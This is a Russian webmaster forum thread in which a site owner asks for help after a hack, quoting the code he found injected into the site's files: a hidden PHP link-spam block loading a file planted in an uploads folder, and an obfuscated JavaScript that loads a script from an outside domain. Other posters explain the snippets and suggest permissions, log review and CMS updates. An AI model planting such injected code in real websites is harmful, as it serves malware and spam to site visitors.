Интересный взлом сайта

T
На сайте с 22.02.2008
Offline
141
1636

Вечер добрый уважаемые форумчане, у моего знакомого есть сайт. Сегодня вечером был видимо взлом, точнее шел залил, хотелось бы разобраться.

И так, сначала сайт грузился очень долго, особенно футер, потом касперский начал ругаться на

Троян программа Exloit.JS.Pdfka.bxa и соотвественно ссылка вела на сайт какой то не буду палить в рамках безопасности, дальше этот гад залил видимо через шел сапу и поставил кликандер

<div style=display:none><?php 

global $sape;
if (!defined('_SAPE_USER')){
define('_SAPE_USER', 'ХЕШ_ПОЛЬЗОВАТЕЛЯ');
}
require_once($_SERVER['DOCUMENT_ROOT'].'/uploads/avatars/avatars_gallery/animation/images/img.php');
$sape = new SAPE_client();
echo $sape->return_links();
?></div>

Шел называется Web Shell by oRb http://forum.xakep.ru/m_1393504/mpage_1/key_/tm.htm#1393504

<script language="JavaScript">

var lankru_html = '';
lankru_html += '<scr' + 'ipt language="JavaSc' + 'ript" ';
lankru_html += 'src="http://knalru' + '.ru/js.php?id=15157';
lankru_html += '&dd=3&url=' + encodeURIComponent(document.location);
lankru_html += '&ref=' + encodeURIComponent(document.referrer);
lankru_html += '&rnd=' + Math.random() + '"></scr' + 'ipt>';
document.write(lankru_html);
</script>

Вот что странно, как он по id грузит скрипт?

Стиот нод32 + аутпост на компе, думаем угнали пароли от ftp, возможно ли такое?

Что посоветуете товарищи? Что вообще делает это всё, насколько серьёзно и можно ли защититься? Подумал подумал, и решил что лучше сидеть под простым пользователем винды и линукса да? Насколько это безопасно?

+ По теме есть ещё 2 файла под зендом, может кто расшифрует, а то не бум ваще в этом, не пинайте сильно просто хочется всё детально узнать, по счёт сапы обратимся в тех поддержку.

T
На сайте с 22.02.2008
Offline
141
#1

UPD: Внедрили не в шаблон гадости эти а в файлы

Dreammaker
На сайте с 20.04.2006
Offline
569
#2
Troyan:
Вот что странно, как он по id грузит скрипт?

по ссылке с параметрами грузится javascript-скрипт, если там написано что это пхп с параметрами, то тут как в известной поговорке о том, что на заборе тоже может быть разное написано.

sashka_
На сайте с 27.01.2010
Offline
103
#3

правильно выставленые права , рулят =) а так смотри логи как залит шелл , если через кмс =) обновляй версию )

Знаю PHP, JS, jQuery. Помощь для вашего сайта. (/ru/forum/840509).
T
На сайте с 22.02.2008
Offline
141
#4

А можно ли было имея всё это получить доступ к бд, скрипт грузился почему то из бд, вот и спрашиваю, что послужило причиной всему этому, вирус на винде? Или старость cms?

sashka_
На сайте с 27.01.2010
Offline
103
#5

дай сайт в личку...=)) если шелл залит )) и твоя кмс работает от базы данных , то можно получить туда доступ )) т.к. логин и пароль к ней лежит где то в файле =))... если вирус на винде то он херячит файлы =)) скорее всего кмс... или где то пароль завсетил

Pentium Prescott
На сайте с 23.10.2008
Offline
213
#6
Troyan:
...А можно ли было имея всё это получить доступ к бд, скрипт грузился почему то из бд...

ясен пень, если шелл залит - то базу читать можно, если база имеет ценность.

Покупка и продажа криптовалют ( https://www.bestchange.ru/?p=1296834 )
A
На сайте с 04.12.2009
Offline
161
#7

Troyan, движок не ВП ?

Урл сайта светите, посмотрим :)

А вот этот код от биржи покупки/продажи трафика lank.ru

<script language="JavaScript"> 

var lankru_html = '';
lankru_html += '<scr' + 'ipt language="JavaSc' + 'ript" ';
lankru_html += 'src="http://knalru' + '.ru/js.php?id=15157';
lankru_html += '&dd=3&url=' + encodeURIComponent(document.location);
lankru_html += '&ref=' + encodeURIComponent(document.referrer);
lankru_html += '&rnd=' + Math.random() + '"></scr' + 'ipt>';
document.write(lankru_html);
</script>
The_Rock
На сайте с 26.02.2009
Offline
89
#8

Ух ты.. У меня тоже пользователь на сайте жаловался, что видел Exloit.JS.Pdfka.bxa. Надо все перепроверить, хотя после того, как я снес одну партнерку, из-за которой видимо антивирь и ругался, жалоб больше не было.

Закажи свое видео! Рекламные ролики, обзоры товаров и услуг, заставки... (/ru/forum/comment/12596209) Более 5 лет опыта и сотни довольных заказчиков.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий